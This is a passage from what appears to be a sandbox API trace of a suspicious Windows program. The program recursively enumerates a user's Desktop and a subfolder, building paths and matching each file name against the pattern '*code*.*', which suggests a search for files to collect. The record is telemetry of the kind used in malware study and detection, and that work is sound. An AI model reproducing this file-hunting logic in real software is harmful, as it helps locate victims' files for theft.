dwReserved1=0x0, cFileName="k8k6qCAjWYmc.odt", cAlternateFileName="K8K6QC~1.ODT")) returned 1 [0110.928] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.928] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.928] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="k8k6qCAjWYmc.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt" [0110.929] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.929] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.929] lstrcatW (in: lpString1="\\", lpString2="k8k6qCAjWYmc.odt" | out: lpString1="\\k8k6qCAjWYmc.odt") returned="\\k8k6qCAjWYmc.odt" [0110.929] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0110.929] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x39700d0, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", lpUsedDefaultChar=0x0) returned 48 [0110.929] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.929] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.929] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.929] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970c00 [0110.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970c00, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.929] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.929] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0110.929] PathMatchSpecW (pszFile="k8k6qCAjWYmc.odt", pszSpec="*code*.*") returned 0 [0110.929] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.929] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.929] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KTOu", cAlternateFileName="")) returned 1 [0110.929] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.929] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.929] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.929] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.929] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.929] lstrcatW (in: lpString1="\\", lpString2="KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.929] lstrcmpW (lpString1="KTOu", lpString2=".") returned 1 [0110.930] lstrcmpW (lpString1="KTOu", lpString2="..") returned 1 [0110.930] lstrcpyW (in: lpString1=0x19c8c0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.930] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*" [0110.930] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7434e0 [0110.930] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.930] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.930] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\." [0110.930] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.930] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.930] lstrcatW (in: lpString1="\\KTOu\\", lpString2="." | out: lpString1="\\KTOu\\.") returned="\\KTOu\\." [0110.930] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.930] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.930] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.930] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.930] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\.." [0110.930] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.930] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.930] lstrcatW (in: lpString1="\\KTOu\\", lpString2=".." | out: lpString1="\\KTOu\\..") returned="\\KTOu\\.." [0110.930] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.930] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.930] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f265de0, ftCreationTime.dwHighDateTime=0x1d7acc3, ftLastAccessTime.dwLowDateTime=0xe01b3e80, ftLastAccessTime.dwHighDateTime=0x1d7af08, ftLastWriteTime.dwLowDateTime=0xe01b3e80, ftLastWriteTime.dwHighDateTime=0x1d7af08, nFileSizeHigh=0x0, nFileSizeLow=0xd048, dwReserved0=0x0, dwReserved1=0x0, cFileName="3CEoMqDCJmINqN85E.bmp", cAlternateFileName="3CEOMQ~1.BMP")) returned 1 [0110.930] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.930] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.930] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="3CEoMqDCJmINqN85E.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp" [0110.931] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.931] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.932] lstrcatW (in: lpString1="\\KTOu\\", lpString2="3CEoMqDCJmINqN85E.bmp" | out: lpString1="\\KTOu\\3CEoMqDCJmINqN85E.bmp") returned="\\KTOu\\3CEoMqDCJmINqN85E.bmp" [0110.932] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.932] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a28a0 [0110.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x29a28a0, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", lpUsedDefaultChar=0x0) returned 58 [0110.932] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2bb8 [0110.932] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a28a0 | out: hHeap=0x29a0000) returned 1 [0110.932] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.932] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970ba0 [0110.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970ba0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.933] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703f8 [0110.933] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ba0 | out: hHeap=0x29a0000) returned 1 [0110.933] PathMatchSpecW (pszFile="3CEoMqDCJmINqN85E.bmp", pszSpec="*code*.*") returned 0 [0110.933] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703f8 | out: hHeap=0x29a0000) returned 1 [0110.933] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2bb8 | out: hHeap=0x29a0000) returned 1 [0110.933] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1872110, ftCreationTime.dwHighDateTime=0x1d7a92f, ftLastAccessTime.dwLowDateTime=0xbc62b500, ftLastAccessTime.dwHighDateTime=0x1d7ace6, ftLastWriteTime.dwLowDateTime=0xbc62b500, ftLastWriteTime.dwHighDateTime=0x1d7ace6, nFileSizeHigh=0x0, nFileSizeLow=0x3ae1, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUCY-_yVF.swf", cAlternateFileName="EUCY-_~1.SWF")) returned 1 [0110.933] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.933] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.933] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="eUCY-_yVF.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf" [0110.933] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.933] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.933] lstrcatW (in: lpString1="\\KTOu\\", lpString2="eUCY-_yVF.swf" | out: lpString1="\\KTOu\\eUCY-_yVF.swf") returned="\\KTOu\\eUCY-_yVF.swf" [0110.933] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.933] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea798 [0110.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x38ea798, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", lpUsedDefaultChar=0x0) returned 50 [0110.933] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2b28 [0110.933] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea798 | out: hHeap=0x29a0000) returned 1 [0110.933] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.933] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970d00 [0110.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970d00, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.933] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.933] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d00 | out: hHeap=0x29a0000) returned 1 [0110.933] PathMatchSpecW (pszFile="eUCY-_yVF.swf", pszSpec="*code*.*") returned 0 [0110.933] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706c8 | out: hHeap=0x29a0000) returned 1 [0110.933] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2b28 | out: hHeap=0x29a0000) returned 1 [0110.933] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58f2e50, ftCreationTime.dwHighDateTime=0x1d7b054, ftLastAccessTime.dwLowDateTime=0xe568fc80, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xe568fc80, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xb99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HLPCM ND3Cl3FgAs3.mp4", cAlternateFileName="HLPCMN~1.MP4")) returned 1 [0110.933] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.934] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.934] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="HLPCM ND3Cl3FgAs3.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4" [0110.934] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.934] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.934] lstrcatW (in: lpString1="\\KTOu\\", lpString2="HLPCM ND3Cl3FgAs3.mp4" | out: lpString1="\\KTOu\\HLPCM ND3Cl3FgAs3.mp4") returned="\\KTOu\\HLPCM ND3Cl3FgAs3.mp4" [0110.934] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.934] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a2bb8 [0110.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x29a2bb8, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", lpUsedDefaultChar=0x0) returned 58 [0110.934] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c90 [0110.934] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2bb8 | out: hHeap=0x29a0000) returned 1 [0110.934] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.934] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970c40 [0110.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970c40, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.934] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970380 [0110.934] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c40 | out: hHeap=0x29a0000) returned 1 [0110.934] PathMatchSpecW (pszFile="HLPCM ND3Cl3FgAs3.mp4", pszSpec="*code*.*") returned 0 [0110.934] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970380 | out: hHeap=0x29a0000) returned 1 [0110.934] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c90 | out: hHeap=0x29a0000) returned 1 [0110.934] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9803e0, ftCreationTime.dwHighDateTime=0x1d7a67d, ftLastAccessTime.dwLowDateTime=0xc285fda0, ftLastAccessTime.dwHighDateTime=0x1d7ada1, ftLastWriteTime.dwLowDateTime=0xc285fda0, ftLastWriteTime.dwHighDateTime=0x1d7ada1, nFileSizeHigh=0x0, nFileSizeLow=0x910b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LQQ8KQ8OZpD-.wav", cAlternateFileName="LQQ8KQ~1.WAV")) returned 1 [0110.934] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.934] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.934] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="LQQ8KQ8OZpD-.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav" [0110.934] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.934] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.934] lstrcatW (in: lpString1="\\KTOu\\", lpString2="LQQ8KQ8OZpD-.wav" | out: lpString1="\\KTOu\\LQQ8KQ8OZpD-.wav") returned="\\KTOu\\LQQ8KQ8OZpD-.wav" [0110.934] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0110.935] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x35) returned 0x38ea8d8 [0110.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x38ea8d8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", lpUsedDefaultChar=0x0) returned 53 [0110.935] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2b28 [0110.935] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea8d8 | out: hHeap=0x29a0000) returned 1 [0110.935] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.935] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970ce0 [0110.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970ce0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.935] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.935] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ce0 | out: hHeap=0x29a0000) returned 1 [0110.935] PathMatchSpecW (pszFile="LQQ8KQ8OZpD-.wav", pszSpec="*code*.*") returned 0 [0110.935] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.935] HeapFree 